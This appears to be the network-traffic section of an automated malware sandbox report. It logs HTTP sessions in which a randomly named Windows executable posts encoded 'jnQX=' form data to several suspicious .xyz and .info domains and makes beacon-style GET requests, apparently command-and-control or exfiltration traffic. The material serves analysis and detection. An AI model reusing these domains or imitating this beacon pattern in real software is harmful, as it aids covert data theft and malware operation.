                                                                                        Data Ascii: jnQX=BDKkReVOQWAWHre7k29F1wzx2iXhT+FegcXK0vUuahxjhut+oeSYDFrteNhY+WFTZt/T644CVFp+3iLrjvRjCFIqjahIV+XTv16CXFDrZexkNLpRhQjw1zkKDxMIboSqEObJF9ApK+UHs6sX3EwYnwzZLFblhnIntqsUkKuX9QgB8sg7Gk1/3SNXCeaUACbLvBMqYdkpGIzsJF5wEPoQhHSLPNZbc2pYiX+Dtz1cL6hI0haWRKhjbtYF9VKLxp0fbQsIgHftU1WoR6OFXQ3KMm2tpyPhCBnvQoVCTv+ZYEZYch9bcD+pagtgfhYe7jgA+oRjP2VVvZw4tpW+y96iLjZ26DAK2A57yQbI0JCBrk2jnSewneNuFNklZ6jp9EBgEwtAAsaGlILphdlXEokuzxqqbJqqmcYr6EowGRCtN+r2+fqz6Qz75u2gBsAcIJBI9d1qbhN0KTCj6A8Apl+3uTnytFrRzFfnbh/eXMu981RGi+l+SQ+nb1dCF33T/1eCWcMD7sqG5Oi9kMFl2eZBaGnAfWZxONOZBn+ngB/bODkgPQ8UR0QZcu1sbmj+E31Xq2MSSxny4/NzpRb8w1bNPxouKqaKn+mkIxXVnCTqq/uFZEcgWAtulm7b54hLStF5ro7r2LIuZ77HeACW2nwSPhQfFol4BfQStvt5Va24QRbG9dL7cLYsn7HJW2+frfKQCFX8lt592vk2Z5h2ubT07onla3m6UtAanhSDpYpYJ1PqsIQ92r6Heltq6STcrouiluaCA1IgDNlax679IWgks3giAhwU40ftksm86HvEta1Gq8l4zUfKnRM94/JSnY5gxuPKtRByMWsdPv5i6rAUqiwibrUxGdA6zgPO+GOB8fYD4cfxWRqDjP4pSdhrDOdkMC36SEt1DG17FcNySb7BHvNqHKTxuWX9/jdFFiYALPhqGSdAJVxmCCrn+Uz92uwEMcgE+ud8z3rSTGfEv93ZCAIvTAoluAg3CxC3TPDQ2sv6GAH [TRUNCATED]
                                                                                        Oct 9, 2024 12:52:09.727711916 CEST1701OUTData Raw: 4d 4a 62 79 4a 43 46 4d 37 36 39 50 79 5a 7a 69 57 78 39 34 65 6f 68 4e 69 4c 6d 5a 37 67 4d 33 38 59 2b 39 55 41 41 39 64 54 57 69 49 44 56 4b 56 50 31 4f 65 4e 73 4e 33 6f 39 39 70 43 64 54 4a 56 67 33 4f 79 55 73 4d 4b 31 66 57 43 75 57 55 6d
                                                                                        Data Ascii: MJbyJCFM769PyZziWx94eohNiLmZ7gM38Y+9UAA9dTWiIDVKVP1OeNsN3o99pCdTJVg3OyUsMK1fWCuWUm4/hrFOJlnA7PpQGxAh2T2s13yWGrTHMO8woGj4k88/M13bgb3S2FKjcCA3krt76+dBkS/Fdf226lU2ZMLZ4FtznPEKGS2JIjWcnsaorq82KiIscIinFTf5aRqvAnYXb5h88Fvh3WLpQyhAYk3JUH1/Mnii0i60wtR
                                                                                        Oct 9, 2024 12:52:10.417404890 CEST245INHTTP/1.1 302 Found
                                                                                        Location: https://www.sailforever.xyz/hshp/
                                                                                        Server: Dynamic Http Server
                                                                                        X-Ratelimit-Limit: 101
                                                                                        X-Ratelimit-Remaining: 100
                                                                                        X-Ratelimit-Reset: 1
                                                                                        Date: Wed, 09 Oct 2024 10:52:10 GMT
                                                                                        Content-Length: 0
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        13192.168.2.2249176103.106.67.112801928C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 9, 2024 12:52:12.268048048 CEST477OUTGET /hshp/?jnQX=MBiESr0hPmgVFuSAv2RW9BnB0CPkTLgBjfLus90OagNghP1boqy5EEnwCusO605/Nd6O3rIecQF22GSlnaUjHXYI37VLW/n7sB3aQUqxecNcJ9xp5B3u2xIsMloC&op9=BLtTm0V HTTP/1.1
                                                                                        Host: www.sailforever.xyz
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Language: en-US,en
                                                                                        Connection: close
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                        Oct 9, 2024 12:52:12.935909986 CEST631INHTTP/1.1 302 Found
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Location: https://www.sailforever.xyz/hshp/?jnQX=MBiESr0hPmgVFuSAv2RW9BnB0CPkTLgBjfLus90OagNghP1boqy5EEnwCusO605/Nd6O3rIecQF22GSlnaUjHXYI37VLW/n7sB3aQUqxecNcJ9xp5B3u2xIsMloC&op9=BLtTm0V
                                                                                        Server: Dynamic Http Server
                                                                                        X-Ratelimit-Limit: 101
                                                                                        X-Ratelimit-Remaining: 100
                                                                                        X-Ratelimit-Reset: 1
                                                                                        Date: Wed, 09 Oct 2024 10:52:12 GMT
                                                                                        Content-Length: 202
                                                                                        Connection: close
                                                                                        Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 61 69 6c 66 6f 72 65 76 65 72 2e 78 79 7a 2f 68 73 68 70 2f 3f 6a 6e 51 58 3d 4d 42 69 45 53 72 30 68 50 6d 67 56 46 75 53 41 76 32 52 57 39 42 6e 42 30 43 50 6b 54 4c 67 42 6a 66 4c 75 73 39 30 4f 61 67 4e 67 68 50 31 62 6f 71 79 35 45 45 6e 77 43 75 73 4f 36 30 35 2f 4e 64 36 4f 33 72 49 65 63 51 46 32 32 47 53 6c 6e 61 55 6a 48 58 59 49 33 37 56 4c 57 2f 6e 37 73 42 33 61 51 55 71 78 65 63 4e 63 4a 39 78 70 35 42 33 75 32 78 49 73 4d 6c 6f 43 26 61 6d 70 3b 6f 70 39 3d 42 4c 74 54 6d 30 56 22 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                                        Data Ascii: <a href="https://www.sailforever.xyz/hshp/?jnQX=MBiESr0hPmgVFuSAv2RW9BnB0CPkTLgBjfLus90OagNghP1boqy5EEnwCusO605/Nd6O3rIecQF22GSlnaUjHXYI37VLW/n7sB3aQUqxecNcJ9xp5B3u2xIsMloC&amp;op9=BLtTm0V">Found</a>.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        14192.168.2.2249177188.114.97.3801928C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 9, 2024 12:52:17.984448910 CEST2472OUTPOST /bd77/ HTTP/1.1
                                                                                        Host: www.launchdreamidea.xyz
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en
                                                                                        Origin: http://www.launchdreamidea.xyz
                                                                                        Referer: http://www.launchdreamidea.xyz/bd77/
                                                                                        Content-Length: 2161
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=0
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                        Data Raw: 6a 6e 51 58 3d 6e 57 30 34 4f 68 76 43 5a 55 55 47 61 61 6a 48 37 50 32 66 37 37 32 70 6a 66 6a 57 55 4f 66 57 5a 45 4c 71 6e 62 74 71 54 36 4e 51 4b 6e 4a 32 41 6a 78 4c 78 38 53 4d 49 45 65 79 41 7a 7a 69 46 6b 56 2f 42 73 7a 77 5a 79 34 69 62 2f 30 6c 41 73 76 67 37 31 64 43 78 7a 37 34 32 34 35 56 59 73 61 54 50 50 57 42 63 4b 4c 50 43 2f 74 65 75 32 4f 41 42 49 45 36 77 61 49 44 52 65 76 58 56 6e 42 63 55 50 67 57 6b 79 43 53 4e 2b 70 42 32 54 6f 57 34 68 79 55 41 4d 57 57 47 66 67 61 39 33 4a 44 71 77 6c 53 6d 75 2b 6e 38 4b 63 55 58 41 31 34 61 49 63 35 6f 5a 74 35 63 54 34 71 41 4c 36 57 41 6a 53 75 55 39 7a 64 79 75 43 49 70 37 2b 41 78 42 59 2b 36 34 57 4f 71 30 6d 69 64 53 45 56 38 48 64 31 67 46 6e 36 72 6f 6c 33 69 4a 6c 4b 7a 68 6a 4f 55 63 46 54 36 51 73 63 4d 31 45 37 56 46 34 2b 45 38 4a 5a 43 55 35 38 50 4d 6f 45 2b 4c 73 30 37 5a 74 73 61 77 59 46 63 67 32 36 49 77 37 30 32 6c 79 74 69 48 51 4c 39 42 68 51 49 51 32 37 45 43 71 79 76 6e 2f 37 68 74 46 50 74 36 43 4f 61 38 64 70 35 [TRUNCATED]
                                                                                        Data Ascii: jnQX=nW04OhvCZUUGaajH7P2f772pjfjWUOfWZELqnbtqT6NQKnJ2AjxLx8SMIEeyAzziFkV/BszwZy4ib/0lAsvg71dCxz74245VYsaTPPWBcKLPC/teu2OABIE6waIDRevXVnBcUPgWkyCSN+pB2ToW4hyUAMWWGfga93JDqwlSmu+n8KcUXA14aIc5oZt5cT4qAL6WAjSuU9zdyuCIp7+AxBY+64WOq0midSEV8Hd1gFn6rol3iJlKzhjOUcFT6QscM1E7VF4+E8JZCU58PMoE+Ls07ZtsawYFcg26Iw702lytiHQL9BhQIQ27ECqyvn/7htFPt6COa8dp5vSpF6WykmEzFLll/wtcnkbtIMGfKQjvGnQrfzF6PFqO6K0aDt2acx/mVMZN+NXaY8nhqansuHrXejgA2Q9UXgW8SSvwHYn3XtwBirIoeoH/mpIX/NK/hsnpw8+Ud30HS9ARuGgQpobNvmmwM6330ypT8H4KI2CMojEPbs0pU5QS+Qp/BLp7uhrf3+umuSbKhgvqxjC3hN+LRK2fhIku0XuC8SiayXBbhXtq7mDuHvc4ZpazoL6JqLvs8LWbzqsmiTdQozhN9v02KRizEefTXFUbCRzTBiMF/eHRoMoRYBZdUfIxErxlRcfxftRlDAwaxmisK4CZK4DJFPtga1Dxriq/P0fWtcXZJ8xIVw0Cut3Tm5ce94iUKPrX4qEzzN600KX0J3J6snOaD4YUIvI4+ko16r6XGlKPulMO1vSz1LWYE409UawI6zvxqTSzx9FP0HyQlcfXWAB1aDG9ngHvRO0ppEPahY04ix6VXcHADnXLHCygymKu9Z0gvOIqq3GhJ+RL1l5Z3aQB3g4+x1uVwQrqO4ej26lW7JhotZNEhExaWydjXBe+Em8ZjHNC+YLIshZ4kB8t7gFXZYKMu3Mqg25bTwwN0gepx+nWSzSxorzNmVaegJWlJpXg0s6aU+z2hnUxuKGf6+0y+31TW+SpvlKr1orL87jLv9I [TRUNCATED]
                                                                                        Oct 9, 2024 12:52:17.989640951 CEST249OUTData Raw: 35 35 38 71 57 52 4f 6d 34 39 67 39 79 67 48 38 72 48 77 52 68 75 78 57 39 53 46 65 54 35 4a 67 6c 38 49 64 6e 36 59 33 47 45 37 45 2b 38 45 47 44 67 45 69 5a 6d 5a 35 4a 68 4b 69 48 33 36 2f 62 70 50 53 37 79 33 63 49 77 6d 55 2f 55 64 4a 2b 74
                                                                                        Data Ascii: 558qWROm49g9ygH8rHwRhuxW9SFeT5Jgl8Idn6Y3GE7E+8EGDgEiZmZ5JhKiH36/bpPS7y3cIwmU/UdJ+thLLIV6aBl9O892w/f9uUMqZBgdIzMkEh5h9iLcEoZJs5tG+y9OS1Dhe40vXXa5ZbcKGMP5Ai6+UlhzPEFsjA/I1dSn/RZdckXZEANuhrFoe7rRzyHzMsIPUq7L34Zn2IvVUbtZCHPHuFtcSvczbDb+A24G+T1Di2b


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        15192.168.2.2249178188.114.97.3801928C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 9, 2024 12:52:20.525227070 CEST760OUTPOST /bd77/ HTTP/1.1
                                                                                        Host: www.launchdreamidea.xyz
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en
                                                                                        Origin: http://www.launchdreamidea.xyz
                                                                                        Referer: http://www.launchdreamidea.xyz/bd77/
                                                                                        Content-Length: 201
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=0
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                        Data Raw: 6a 6e 51 58 3d 6e 57 30 34 4f 68 76 43 5a 55 55 47 61 64 33 48 36 65 32 66 71 72 32 70 75 2f 6a 57 62 75 65 38 5a 45 47 4b 6e 61 5a 45 54 4a 64 51 4c 33 35 32 41 52 70 4c 79 38 53 4e 64 30 65 32 64 44 79 6f 46 6b 55 57 42 75 6e 77 5a 32 6f 69 61 64 4d 6c 47 74 76 6a 7a 6c 64 4d 6b 44 37 35 32 34 38 72 59 73 47 44 50 4d 57 42 63 4a 76 50 42 2f 64 65 6c 7a 61 41 46 34 45 34 32 61 49 51 52 62 33 4f 56 6e 52 55 55 4d 6b 57 6c 48 69 53 49 2f 4a 42 38 69 6f 57 79 42 79 52 59 63 57 48 47 39 46 33 78 42 39 68 76 44 49 38 34 73 71 57 6a 49 73 47 53 43 42 77 57 61 4a 57 72 73 68 6f 61 77 67 68 66 67 3d 3d
                                                                                        Data Ascii: jnQX=nW04OhvCZUUGad3H6e2fqr2pu/jWbue8ZEGKnaZETJdQL352ARpLy8SNd0e2dDyoFkUWBunwZ2oiadMlGtvjzldMkD75248rYsGDPMWBcJvPB/delzaAF4E42aIQRb3OVnRUUMkWlHiSI/JB8ioWyByRYcWHG9F3xB9hvDI84sqWjIsGSCBwWaJWrshoawghfg==


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        16192.168.2.2249179188.114.97.3801928C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 9, 2024 12:52:23.075068951 CEST2472OUTPOST /bd77/ HTTP/1.1
                                                                                        Host: www.launchdreamidea.xyz
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en
                                                                                        Origin: http://www.launchdreamidea.xyz
                                                                                        Referer: http://www.launchdreamidea.xyz/bd77/
                                                                                        Content-Length: 3625
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=0
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                        Data Raw: 6a 6e 51 58 3d 6e 57 30 34 4f 68 76 43 5a 55 55 47 4c 4e 48 48 31 64 75 66 36 37 33 62 68 66 6a 57 55 4f 66 55 5a 45 4b 4b 6e 62 74 71 54 37 78 51 4b 6b 78 32 4f 54 78 4c 77 38 53 4e 4a 45 65 79 41 7a 7a 68 46 6b 77 6b 42 73 2f 4b 5a 30 6b 69 62 2b 30 6c 41 76 48 67 38 31 64 43 7a 7a 37 36 32 34 39 6a 59 76 75 48 50 4d 53 72 63 4a 6e 50 42 71 78 65 6a 44 61 48 4b 59 45 34 32 61 4a 52 52 62 32 74 56 6e 5a 4d 55 4e 74 52 6b 31 36 53 52 65 70 42 2b 44 6f 52 30 42 79 4e 57 38 57 51 47 66 64 38 39 33 4a 39 71 77 77 4a 6d 75 79 6e 2f 37 38 55 58 44 4e 6e 56 34 63 34 6d 35 74 35 53 7a 34 6f 41 4c 37 4a 41 6a 53 75 55 38 66 64 77 2b 43 49 70 2b 53 44 38 68 59 2b 33 59 57 50 33 6c 61 32 64 57 6b 72 38 48 4e 6c 67 57 4c 36 6c 4c 4e 33 6d 35 6c 4b 36 78 6a 49 55 63 46 4b 30 41 73 2b 4d 31 4d 46 56 46 70 7a 45 38 4a 5a 43 58 68 38 46 2f 41 45 33 37 73 30 6e 70 74 76 4e 67 59 47 63 67 36 59 49 78 66 30 32 6c 61 74 77 41 73 4c 37 44 4a 54 41 41 32 36 41 43 71 77 72 6e 2f 75 68 75 78 78 74 36 4b 30 61 38 74 70 35 [TRUNCATED]
                                                                                        Data Ascii: jnQX=nW04OhvCZUUGLNHH1duf673bhfjWUOfUZEKKnbtqT7xQKkx2OTxLw8SNJEeyAzzhFkwkBs/KZ0kib+0lAvHg81dCzz76249jYvuHPMSrcJnPBqxejDaHKYE42aJRRb2tVnZMUNtRk16SRepB+DoR0ByNW8WQGfd893J9qwwJmuyn/78UXDNnV4c4m5t5Sz4oAL7JAjSuU8fdw+CIp+SD8hY+3YWP3la2dWkr8HNlgWL6lLN3m5lK6xjIUcFK0As+M1MFVFpzE8JZCXh8F/AE37s0nptvNgYGcg6YIxf02latwAsL7DJTAA26ACqwrn/uhuxxt6K0a8tp5t6pHbWylWE8CLlh7wxqnkTTIMDiKTnvUGQrY2R9N1qy/K0cON28cxzIVN5N+cPaZ4Xh95/vv3rcajgT8w9AXk2kSQHgGoX3WdwByd8nSYH6y5IB2tKphsnbw9ebdGMHS9wRpTMQpobO6Wm6Ha6Q01hX8H0aI2uMpy0Pbt0pZ5QSwwpyIroMuh+k3/Gc7yfKmCHq3l23pN+JXK2alIkJ0XeC8QuKyXpbi2tq7D3uPPc8QJaaoL6vqNyt8P6LzpYmiXBQ/BJNwP03MRi3P+ejXFcLCSn9BjEF++nRu9oRbhZfaPIxdbwwRcnHfpIeDB4axXysD4CeN4DOHPtne1Djri6/P0bWtd/ZJPZIX3oCzt3V4JdPkpegKP7b4v9szP+00Yv0BR15ynOAToYSMvIA+koP6vvMGWOPuxAOz+Ss2rWfOY0QLKw46yfXqXTo2ORP0GiQlv3XXwB1aDHrngHzROoXpGXwhY044BWVUu/AIHXKPiyB2mKw9Z4GvP8Qq0ShIvxL1l5WqaQG+A45x1qiwQrAO4Sj2opWpr5os6lEnkxaVydkZhe7Em8JjC0f+drI+Fl4lCV7kgFWQ4KWlXxtg215T08N1T6p+N/WRDSx2by/u1aLkJapJo630tqKXLv2zBExsNScve0vwX1RW+WkvlCz1oT984TLsdI [TRUNCATED]
                                                                                        Oct 9, 2024 12:52:23.080526114 CEST1713OUTData Raw: 35 6c 63 71 49 52 4f 6d 79 79 41 78 54 67 48 38 4a 48 78 56 68 75 77 6d 39 53 47 57 54 34 35 67 6b 6c 59 64 6d 67 49 32 41 4c 62 45 79 38 45 48 79 67 42 53 7a 6d 62 31 4a 69 59 61 48 6e 62 2f 62 70 66 53 39 34 58 64 4f 36 47 4a 6d 55 64 56 79 74
                                                                                        Data Ascii: 5lcqIROmyyAxTgH8JHxVhuwm9SGWT45gklYdmgI2ALbEy8EHygBSzmb1JiYaHnb/bpfS94XdO6GJmUdVytkmwLgGaDX1Ou7iw4/9vVMqYBgQVzIAYh7JHiaQEppJs9v+x4tOIyDhp40vzXZYebYfeML1Ai4WU3hzAC1slD/IRdS6pRZUNkXJEAMChrl4e8rRzwHzNyYOQ3rHw4ZaqerFGMaNtZNOVM7Iwp+noMIyj6LWucXHIof


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        17192.168.2.2249180188.114.97.3801928C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 9, 2024 12:52:25.808135033 CEST481OUTGET /bd77/?op9=BLtTm0V&jnQX=qUcYNRi6MmsiGKrh9NCA2amnhNOWcK/IcWj4n4RDTJ9SK0tIDWNU88L5d2vVfSnlJTsqAOrwZWsiYZ0lCIKh+05AxDn9xcp1Qtj0O+O6OKrHR59mj2SDK4c9wfNV HTTP/1.1
                                                                                        Host: www.launchdreamidea.xyz
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Language: en-US,en
                                                                                        Connection: close
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                        Oct 9, 2024 12:53:05.029771090 CEST738INHTTP/1.1 522
                                                                                        Date: Wed, 09 Oct 2024 10:53:04 GMT
                                                                                        Content-Type: text/plain; charset=UTF-8
                                                                                        Content-Length: 15
                                                                                        Connection: close
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y4abu7A8WJYjZACEDueprlqM21xOVteCY2RGCmQx4y8QWP%2FC6odcwfmXFJ3MbFSBTHQ1npj%2Bsh6R4qr8QyyaM%2FuVMMiDT5vBeRg714dL0lvxFwadmqMfm77s7Q%2BGHRb22dDPUAihl6rVYQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        Referrer-Policy: same-origin
                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8cfdd237c9285e65-EWR
                                                                                        Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32
                                                                                        Data Ascii: error code: 522


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        18192.168.2.22491813.33.130.190801928C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 9, 2024 12:53:10.071788073 CEST2472OUTPOST /t10u/ HTTP/1.1
                                                                                        Host: www.mondayigboleague.info
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en
                                                                                        Origin: http://www.mondayigboleague.info
                                                                                        Referer: http://www.mondayigboleague.info/t10u/
                                                                                        Content-Length: 2161
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=0
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                        Data Raw: 6a 6e 51 58 3d 2b 30 4d 75 48 50 43 4e 70 6d 30 61 46 39 48 74 67 41 53 49 32 71 66 65 62 67 48 2b 78 50 41 58 73 74 4b 47 6a 5a 51 44 43 69 6b 6f 4c 6e 47 55 47 67 75 37 73 4e 67 68 42 4f 79 6f 32 30 63 34 4f 50 7a 45 75 78 71 37 4c 51 43 79 46 65 34 47 72 45 7a 78 76 51 4a 58 4e 30 54 6d 4e 61 4a 44 65 32 30 59 59 70 6a 58 41 63 6d 6c 75 52 77 49 64 2b 48 6c 6e 39 49 4b 68 76 63 73 54 64 72 6d 77 30 35 4f 78 59 46 76 49 57 39 73 39 78 33 52 66 55 72 58 6e 45 6e 44 6a 59 4c 74 36 6c 6c 34 58 6f 42 74 69 62 46 33 46 72 56 4c 2b 4c 71 2f 44 73 77 58 44 74 74 77 32 63 41 72 65 72 71 37 76 7a 61 2f 36 62 63 75 32 6f 74 76 6c 77 77 62 39 4e 48 6d 6a 30 69 4e 55 73 58 64 59 4f 34 4e 34 44 30 55 4c 5a 71 37 73 6b 2f 55 64 4c 71 4c 4c 2f 2b 41 7a 44 33 64 69 38 46 4d 2f 37 53 6d 4b 55 64 72 4a 66 6b 6f 4c 2f 38 78 63 50 7a 41 33 38 68 69 4a 5a 33 48 55 69 79 30 46 59 4c 4d 4e 64 45 76 70 62 55 46 43 78 4f 72 37 59 68 76 65 61 30 44 69 72 37 4f 49 4a 73 64 50 47 55 56 4b 34 35 5a 38 6d 47 43 73 39 57 50 4a [TRUNCATED]
                                                                                        Data Ascii: jnQX=+0MuHPCNpm0aF9HtgASI2qfebgH+xPAXstKGjZQDCikoLnGUGgu7sNghBOyo20c4OPzEuxq7LQCyFe4GrEzxvQJXN0TmNaJDe20YYpjXAcmluRwId+Hln9IKhvcsTdrmw05OxYFvIW9s9x3RfUrXnEnDjYLt6ll4XoBtibF3FrVL+Lq/DswXDttw2cArerq7vza/6bcu2otvlwwb9NHmj0iNUsXdYO4N4D0ULZq7sk/UdLqLL/+AzD3di8FM/7SmKUdrJfkoL/8xcPzA38hiJZ3HUiy0FYLMNdEvpbUFCxOr7Yhvea0Dir7OIJsdPGUVK45Z8mGCs9WPJyYFDozx+y0ZRqxm9+e2Z3h4DGS+aoM0FmTxBBHsNvylhBwE9cEaDCoUq5rCLXGoJhdcK8Ytow9a7c3kNR4xXkANuWEmkwebxu7dZxAg+DbgH/sf+QG6yLIjCwfhJwx1aZG+pHeKUF7Srw8NMmLBgdXDzno/tKbBJFY9WJ0f6LUy6fEuwhnWV0C0qvOa1jw1lFNwWhBic/4cbypy7kovrflLk8VrhUMTnBdRIFo6wMp/kUBaO8CCzBHUMsEFEdH6/lJ9ZW+b9XttyqfzKLGV79ThiLO7F+g8+X9TebscMMlu8YUzYZEYMNkWp2eHFNwRjIgno3Sva7IJxiExTnA2aKEnmtE3dk5WtfOq9S+Iv2g9xVo6Q68FOvlh6ibUyNVkxBv5LT6P49i8MuIc6YalvFR8UdEabKh092lkOQRZV83kjeLo5/YbcYe0/I5lSwX8GnHhB454wA4Awk1DIgHYlkzTAvVsrq7ARjFphdqA13axsR1/HWXRJhbqqMgU6juSj67pxTIVf5dWJpvFJcyNCRTX5LcxwfMK+hbc3yIi4PqODGS7dJ0f2y4NNhgcoxzEliA/bNwtO0OQItjM+laUGn65t/+mxbcIwvcA3zZx8Mf4hIFR1QSVIiESKKAB0+qCSevrzk+6WDf9WXbWt7hPx0llSPki9utYVvM [TRUNCATED]
                                                                                        Oct 9, 2024 12:53:10.077300072 CEST255OUTData Raw: 39 53 44 33 79 32 4f 55 6b 32 39 73 39 2f 55 74 35 32 47 38 64 58 63 6a 53 49 51 65 76 50 69 76 2b 6d 4b 76 68 45 74 48 56 5a 79 4f 58 58 35 61 52 6f 76 71 4b 35 5a 4d 36 4c 57 48 6b 35 57 44 4f 4a 41 47 74 4b 2b 62 66 31 41 64 46 4a 69 6e 49 37
                                                                                        Data Ascii: 9SD3y2OUk29s9/Ut52G8dXcjSIQevPiv+mKvhEtHVZyOXX5aRovqK5ZM6LWHk5WDOJAGtK+bf1AdFJinI7GS0ZbTJjxU2IzJoOtXSopIeP4lNHP93YV0ZCXJ3hHJmG8nhn0PgV+t5ZZOKyEulXNZspB1fk86A5XX81O6EyH+2287SwPZUIMyhCxbKnJv1TeF7eXZJ07O56d5CLEg47058xREi1urq9aEoqh0uODG4C9Wt+qAzEE


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        19192.168.2.22491823.33.130.190801928C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 9, 2024 12:53:12.611421108 CEST766OUTPOST /t10u/ HTTP/1.1
                                                                                        Host: www.mondayigboleague.info
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en
                                                                                        Origin: http://www.mondayigboleague.info
                                                                                        Referer: http://www.mondayigboleague.info/t10u/
                                                                                        Content-Length: 201
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=0
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
